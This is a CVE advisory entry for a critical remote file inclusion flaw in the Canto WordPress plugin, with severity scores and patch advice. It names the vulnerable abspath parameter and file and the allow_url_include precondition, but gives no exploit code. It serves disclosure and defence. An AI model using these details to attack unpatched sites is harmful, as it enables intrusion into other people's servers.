CVE-2024-4936
Published: 14 June 2024
Summary
CVE-2024-4936 is a critical-severity PHP Remote File Inclusion (CWE-98) vulnerability in Canto Canto. Its CVSS base score is 9.8 (Critical).
Operationally, ranked in the top 6.2% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
Deeper analysis
The Canto plugin for WordPress is vulnerable to remote file inclusion in all versions through 3.0.8. The flaw exists in the abspath parameter handling within includes/lib/sizes.php and permits an unauthenticated attacker to supply a remote URL that the server will include and execute when the PHP allow_url_include directive is enabled on the target host. The issue carries a CVSS 3.1 score of 9.8.
An unauthenticated network attacker can exploit the vulnerability by sending a crafted request that references a remote file under their control. Successful exploitation results in arbitrary code execution on the web server with the privileges of the web-server process, giving the attacker full control over the affected WordPress site and any data it processes.
Public references from Wordfence and the WordPress plugin Trac indicate that the issue was addressed in a subsequent plugin release; administrators are advised to update to the newest version of the Canto plugin and to ensure allow_url_include remains disabled unless explicitly required.
The EPSS score for this CVE rose from a low baseline to a recorded peak of 0.1598, indicating that exploitation interest increased after public disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-44502
Vulnerability details
The Canto plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 3.0.8 via the abspath parameter. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code…
more
execution. This required allow_url_include to be enabled on the target site in order to exploit.
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.